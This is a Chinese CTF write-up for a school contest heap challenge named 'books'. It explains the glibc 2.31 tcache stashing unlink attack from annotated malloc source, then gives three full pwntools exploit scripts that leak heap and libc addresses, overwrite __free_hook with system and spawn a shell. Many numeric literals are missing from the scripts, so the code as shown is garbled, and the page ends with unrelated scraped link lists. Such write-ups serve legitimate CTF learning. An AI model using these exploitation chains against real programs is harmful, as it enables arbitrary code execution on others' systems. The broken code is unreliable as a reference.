今年校赛有点可惜,最后两道质量不错的pwn每做出来,总的来说还是我太菜了,希望下次校赛能AK pwn题。不过这次校赛也没有白打,还是有学到新的东西的。在这里感谢出题的学长。

glibc-2.29以后unsortbin attack不能用了,不过可以通过把多余的chunk移入tcache实现。下面从源码分析一下具体原理。注意:接下来分析的源码版本都是glibc-2.31的。

直接看smallbin部分

    if (in_smallbin_range (nb))

    {

        idx = smallbin_index (nb);

        bin = bin_at (av, idx);

        if ((victim = last (bin)) != bin)

        {

            bck = victim->bk;

            if (__glibc_unlikely (bck->fd != victim)) //检测是否构成双向链表

                malloc_printerr ("malloc(): smallbin double linked list corrupted");

            set_inuse_bit_at_offset (victim, nb);   //给物理相邻的高地址chunk设置prev_inuse标志位

            //将符合的chunk从链表中取出来

            bin->bk = bck;

            bck->fd = bin;

            if (av != &main_arena)

                set_non_main_arena (victim);

            check_malloced_chunk (av, victim, nb);

#if USE_TCACHE

            /* While we're here, if we see other chunks of the same size,

               stash them in the tcache.  */

            size_t tc_idx = csize2tidx (nb);

            if (tcache && tc_idx < mp_.tcache_bins)

            {

                mchunkptr tc_victim;

                /* While bin not empty and tcache not full, copy chunks over.  */

                while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = last (bin)) != bin) //需要mp_.tcache_count来推出循环,否则会报错

                {

                    if (tc_victim != )

                    {

                        bck = tc_victim->bk;

                        set_inuse_bit_at_offset (tc_victim, nb);  //给物理相邻的高地址chunk设置prev_inuse标志位

                        if (av != &main_arena)                    //不是主分配区设置non_main_arena标志

                            set_non_main_arena (tc_victim);

                        bin->bk = bck;

                        bck->fd = bin;

                        tcache_put (tc_victim, tc_idx);

                    }

                }

            }

#endif

            void *p = chunk2mem (victim);

            alloc_perturb (p, bytes);

            return p;

        }

    }

下面我们用一个图来解释一下:

假如有如左边的smallbin链表,如果我们修改chunk1的bk指针,使其指向target address-0x10,接下来malloc(chunk2)。由于smallbin还有剩下的chunk,所以会把剩余的chunk放入tcahce。这时就可以在target address处写入smallbin的地址。

  • 为了防止程序崩溃,对应大小tcahce bin中必须已有6个chunk,即stash一个chunk后就会因tachce bin满了结束stash。
  • 在修改chunk1的bk指针时不能破坏fd指针,所以这个利用方法一般要求能泄漏heap_base。

接下里放一道例题,这是今年校赛的题目。链接:https://github.com/countfatcode/countfatcode.github.io/tree/master/%E9%A2%98%E7%9B%AE/ZJGSUCTF2020/books

程序就不分析了,总体的利用思路就是利用tcache stashing unlink attack修改大小,然后绕过验证,利用malloc函数实现在__free_hook中写入system。然后getshell。脚本如下:

#-*- coding:utf- -*-

from pwn import *

context(os = 'linux', arch = 'amd64', log_level = 'debug', terminal = ['tmux', 'splitw', '-h'])

p = process('./books')

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

p.sendlineafter('name? ', 'yuan')

def Buy(index, size, content):

    p.sendlineafter('Your choice: ', '')

    p.sendlineafter('book? ', str(index))

    p.sendlineafter('content? ', str(size))

    p.sendafter('input your content: ', content)

    p.sendlineafter('want a receipt? [y/n] ', 'n')

def Sell(index):

    p.sendlineafter('Your choice: ', '')

    p.sendlineafter('book? ', str(index))

def Write(index, content):

    p.sendlineafter('Your choice: ', '')

    p.sendlineafter('book? ', str(index))

    p.sendafter('content: ', content)

def Read(index):

    p.sendlineafter('Your choice: ', '')

    p.sendlineafter('book? ', str(index)) 

def Magic(data):

    p.sendlineafter('Your choice: ', str(0xdeadbeef))

    p.sendafter('Here is a magic place.\n', data)

Buy(, 0x120, 'AAAAA\n')

Buy(, 0x120, '/bin/sh\x00\n')

Sell()

Write(, '\x00'*0x120)

Sell()

Write(, '\x00'*0x120)

Sell()

############################  leak heap_base ######################

Read()

#raw_input('#')

p.recvuntil("book's content: ")

heap_base = u64(p.recv() + '\x00\x00') - 0x2d0

info("heap_base ==> " + hex(heap_base))

Write(, '\x00'*0x120)

Sell()

Write(, '\x00'*0x120)

Sell()

Write(, '\x00'*0x120)

Sell()

Write(, '\x00'*0x120)

Sell()

Write(, '\x00'*0x120)

Sell()

################# leak libc_base #################

Read()

p.recvuntil("book's content: ")

libc_base = u64(p.recv().ljust(, '\x00')) - 0x1ebbe0

info("libc_base ==> " + hex(libc_base))

malloc_hook = libc_base + libc.sym['__malloc_hook']

info("malloc_hook ==> " + hex(malloc_hook))

system_addr = libc_base + libc.sym['__libc_system']

info("system_addr ==> " + hex(system_addr))

free_hook = libc_base + libc.sym['__free_hook']

info("free_hook ==> " + hex(free_hook))

#布置好free_hook

Buy(, 0x233, 'AAAA\n')

Sell()

Write(, p64(free_hook) + '\x00'* + '\n')

Buy(, 0x140, 'AAAA\n')

#在tcache中放6个chunk,为下面tcache stash做准备

Buy(, 0x100, 'AAAA\n')

Buy(, 0x140, 'AAAA\n')

for i in range():

    Sell()

    Write(, '\x00'*0x20 + '\n')

Sell()

#接下来的目标是在smallbin中放入两个0x240大小的chunk

for i in range():

    Buy(, 0x310, 'AAAA\n')

    Sell()

for i in range():

    Buy(, 0x310, 'AAAA\n')

    Buy(, 0x200, 'AAAA\n') #防止free时被top chunk合并

    Sell()

    Buy(, 0x200, 'AAAAA\n') #split chunk

    Buy(, 0x110, '/bin/sh\x00\n')

payload = '\x00'*0x200 + p64() + p64(0x111) + p64(heap_base+0x21f0) + p64(heap_base+0x44)

Write(, payload)

Buy(, 0x100, 'AAAA\n') #tcache stash

Magic('AAAA\n')

Magic(p64(system_addr) + '\x00\n')

Sell()

p.interactive()

解法二:

利用tachebin最多可以放7个chunk的机制绕过小于的限制。脚本如下:

#-*- coding:utf- -*-

from pwn import *

context(os = 'linux', arch = 'amd64', log_level = 'debug', terminal = ['tmux', 'splitw', '-h'])

p = process('./books')

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

p.sendlineafter('name? ', 'yuan')

def Buy(index, size, content):

    p.sendlineafter('Your choice: ', '')

    p.sendlineafter('book? ', str(index))

    p.sendlineafter('content? ', str(size))

    p.sendafter('input your content: ', content)

    p.sendlineafter('want a receipt? [y/n] ', 'n')

def Sell(index):

    p.sendlineafter('Your choice: ', '')

    p.sendlineafter('book? ', str(index))

def Write(index, content):

    p.sendlineafter('Your choice: ', '')

    p.sendlineafter('book? ', str(index))

    p.sendafter('content: ', content)

def Read(index):

    p.sendlineafter('Your choice: ', '')

    p.sendlineafter('book? ', str(index)) 

def Magic(data):

    p.sendlineafter('Your choice: ', str(0xdeadbeef))

    p.sendafter('Here is a magic place.\n', data)

for i in range():

    Buy(, 0x230, 'AAAA\n')

    Sell()

Buy(, 0x230, 'AAAAA\n')

Buy(, 0x100, 'AAAA\n')

Sell()

Read()

p.recvuntil('content: ')

libc_base = u64(p.recv() + '\x00\x00') - 0x1ebbe0

info("libc_base ==> " + hex(libc_base))

free_hook = libc_base + libc.sym['__free_hook']

system_addr = libc_base + libc.sym['system']

Write(, p64(free_hook) + '\x00\x00'* + '\n')

Buy(, 0x100, '/bin/sh\x00\n')

Magic('AAAAA\n')

Magic(p64(system_addr))

Sell()

p.interactive()

解法三:

由于题目没有限制好,在malloc chunk时可以输入索引4,直接可以绕过小于5的限制,接下来的利用方法和解法二类似。

#-*- coding:utf- -*-

from pwn import *

context(os = 'linux', arch = 'amd64', log_level = 'debug', terminal = ['tmux', 'splitw', '-h'])

p = process('./books')

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

p.sendlineafter('name? ', 'yuan')

def Buy(index, size, content):

    p.sendlineafter('Your choice: ', '')

    p.sendlineafter('book? ', str(index))

    p.sendlineafter('content? ', str(size))

    p.sendafter('input your content: ', content)

    p.sendlineafter('want a receipt? [y/n] ', 'n')

def Sell(index):

    p.sendlineafter('Your choice: ', '')

    p.sendlineafter('book? ', str(index))

def Write(index, content):

    p.sendlineafter('Your choice: ', '')

    p.sendlineafter('book? ', str(index))

    p.sendafter('content: ', content)

def Read(index):

    p.sendlineafter('Your choice: ', '')

    p.sendlineafter('book? ', str(index)) 

def Magic(data):

    p.sendlineafter('Your choice: ', str(0xdeadbeef))

    p.sendafter('Here is a magic place.\n', data)

Buy(, 0x233, 'AAAA\n')

Sell()

Buy(, 0x120, 'AAAAA\n')

Buy(, 0x120, '/bin/sh\x00\n')

Sell()

Write(, '\x00'*0x120)

Sell()

Write(, '\x00'*0x120)

Sell()

Write(, '\x00'*0x120)

Sell()

Write(, '\x00'*0x120)

Sell()

Write(, '\x00'*0x120)

Sell()

Write(, '\x00'*0x120)

Sell()

Write(, '\x00'*0x120)

Sell()

Read()

p.recvuntil("book's content: ")

libc_base = u64(p.recv().ljust(, '\x00')) - 0x1ebbe0

info("libc_base ==> " + hex(libc_base))

malloc_hook = libc_base + libc.sym['__malloc_hook']

info("malloc_hook ==> " + hex(malloc_hook))

system_addr = libc_base + libc.sym['__libc_system']

info("system_addr ==> " + hex(system_addr))

free_hook = libc_base + libc.sym['__free_hook']

info("free_hook ==> " + hex(free_hook))

Buy(, 0x233, 'AAAA\n')

Sell()

Write(, p64(free_hook))

Buy(, 0x120, '/bin/sh\x00\n')

raw_input('@')

Magic('AAAA\n')

Magic(p64(system_addr) + '\x00\n')

Sell()

p.interactive()

Tcahce Stashing Unlink Attack的更多相关文章

  1. glibc2.29以上 IO_FILE 及 house of pig

    摆烂很长时间之后,终于下定决心来看点新的东西.正好 winmt 师傅前不久把他 pig 修好的附件发给我了,我就借此来学习一下新版本的 IO_FILE 及 house of pig. 新版本的 IO_ ...

  2. 2021能源PWN wp

    babyshellcode 这题考无write泄露,write被沙盒禁用时,可以考虑延时盲注的方式获得flag,此exp可作为此类型题目模版,只需要修改部分参数即可,详细见注释 from pwn im ...

  3. PHP filesystem attack vectors - Take Two

    http://www.ush.it/2009/07/26/php-filesystem-attack-vectors-take-two/ Did you enjoyed our previous &q ...

  4. TSec《mysql client attack chain》

    从这个议题学到挺多,攻击手法的串联. 1.mysql Client Attack 这个攻击手法去年就爆出来了,本质就是mysql协议问题,在5步篡改读取客户端内容,导致任意文件读取,如下图所示. 修改 ...

  5. Unlink学习总结

    Unlink 本文参考了CTF-wiki 和glibc 源码 原理: 我们在利用 unlink 所造成的漏洞时,其实就是借助 unlink 操作来达成修改指针的效果. 我们先来简单回顾一下 unlin ...

  6. Linux堆溢出漏洞利用之unlink

    Linux堆溢出漏洞利用之unlink 作者:走位@阿里聚安全 0 前言 之前我们深入了解了glibc malloc的运行机制(文章链接请看文末▼),下面就让我们开始真正的堆溢出漏洞利用学习吧.说实话 ...

  7. unlink和close关系

    今天看到nginx用文件锁实现互斥的实现方案时,发现,unlink文件后还可需用fd,很是纳闷!于是搜索到此文,并自测了下,涨姿势了~分享给大家~ 原理: 每一个文件,都可以通过一个struct st ...

  8. 【Cocos2d-x for WP8 学习整理】(2)Cocos2d-Html5 游戏 《Fruit Attack》 WP8移植版 开源

    这一阵花了些时间,把 cocos2d-html5 里的sample 游戏<Fruit Attack>给移植到了WP8上来,目前已经实现了基本的功能,但是还有几个已知的bug,比如WP8只支 ...

  9. Web 服务器 low bandth DOS attack

    https://www.owasp.org/images/0/04/Roberto_Suggi_Liverani_OWASPNZDAY2010-Defending_against_applicatio ...

随机推荐

  1. 【计算机算法设计与分析】——SVM

    一.简介 支持向量机(support vector machines)是一种二分类模型,它的目的是寻找一个超平面来对样本进行分割,分割的原则是间隔最大化,最终转化为一个凸二次规划问题来求解.由简至繁的 ...

  2. C#LeetCode刷题之#695-岛屿的最大面积( Max Area of Island)

    问题 该文章的最新版本已迁移至个人博客[比特飞],单击链接 https://www.byteflying.com/archives/3736 访问. 给定一个包含了一些 0 和 1的非空二维数组 gr ...

  3. Mybatis中<![cdata[ ]]>

    1.<![cdata[ ]]>介绍 <![cdata[ 内容 ]]>是一种xml语法,在CDATA标记中的信息被解析器原封不动地传给应用程序,并且不解析该段信息中的任何控制标记 ...

  4. 欧几里得算法(gcd) 裴蜀定理 拓展欧几里得算法(exgcd)

    欧几里得算法 又称辗转相除法 迭代求两数 gcd 的做法 由 (a,b) = (a,ka+b) 的性质:gcd(a,b) = gcd(b,a mod b) int gcd(int a,int b){ ...

  5. Eclipse怎么切换工作空间

    1.进行点击Eclipse编辑代码的窗口界面中,进行点击菜单中file的选项. 2.弹出了下拉菜单中进行选择为“switch workspace”的选项. 3.弹出了下一级菜单中进行选择为other的 ...

  6. unity探索者之iOS微信登录、分享

    版权声明:本文为原创文章,转载请声明http://www.cnblogs.com/unityExplorer/p/8405700.html iOS接入微信的SDK相对于安卓要麻烦一点,除了核心功能代码 ...

  7. Url跳转漏洞常见

    Url跳转漏洞常见出现点: 1.用户登录.统一身份认证处,认证完后会跳转. 2.用户分享.收藏内容过后,会跳转. 3.跨站点认证.授权后,会跳转. 4.站内点击其它网址链接时,会跳转. Url跳转漏洞 ...

  8. async + await 异步

    先执行A在执行B再执行.then里面的AAA() { XXXXX一堆代码 this.BBB().then(()=>{ 其他代码 })}, async BBB(){ let res = await ...

  9. C# 监听值的变化

    1.写一个监听值变化的类 public class MonitorValueChange { private Visibility myValue; public Visibility MyValue ...

  10. consul、eureka、nacos对比

    consul.eureka.nacos对比 配置中心 eureka 不支持 consul 支持 但用起来偏麻烦,不太符合springBoot框架的命名风格,支持动态刷新 nacos 支持 用起来简单, ...